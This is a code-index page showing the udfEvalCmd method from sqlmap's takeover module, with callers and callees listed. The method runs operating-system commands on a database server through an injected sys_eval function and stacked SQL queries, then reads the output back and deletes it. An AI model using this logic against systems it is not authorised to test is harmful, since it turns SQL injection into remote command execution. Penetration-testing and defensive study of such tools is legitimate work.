MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / udfEvalCmd

Method udfEvalCmd

lib/takeover/udf.py:89–110  ·  view source on GitHub ↗
(self, cmd, first=None, last=None, udfName=None)

Source from the content-addressed store, hash-verified

87 return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
88
89 def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
90 if udfName is None:
91 udfName = "sys_eval"
92
93 if conf.direct:
94 output = self.udfExecCmd(cmd, udfName=udfName)
95
96 if output and isinstance(output, (list, tuple)):
97 new_output = ""
98
99 for line in output:
100 new_output += line.replace("\r", "\n")
101
102 output = new_output
103 else:
104 cmd = unescaper.escape(self.udfForgeCmd(cmd))
105
106 inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
107 output = unArrayizeValue(inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False))
108 inject.goStacked("DELETE FROM %s" % self.cmdTblName)
109
110 return output
111
112 def udfCheckNeeded(self):
113 if (not any((conf.fileRead, conf.commonFiles)) or (any((conf.fileRead, conf.commonFiles)) and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:

Callers 3

udfInjectCustomMethod · 0.95
evalCmdMethod · 0.80
stackedReadFileMethod · 0.80

Calls 5

udfExecCmdMethod · 0.95
udfForgeCmdMethod · 0.95
unArrayizeValueFunction · 0.90
replaceMethod · 0.45
escapeMethod · 0.45

Tested by

no test coverage detected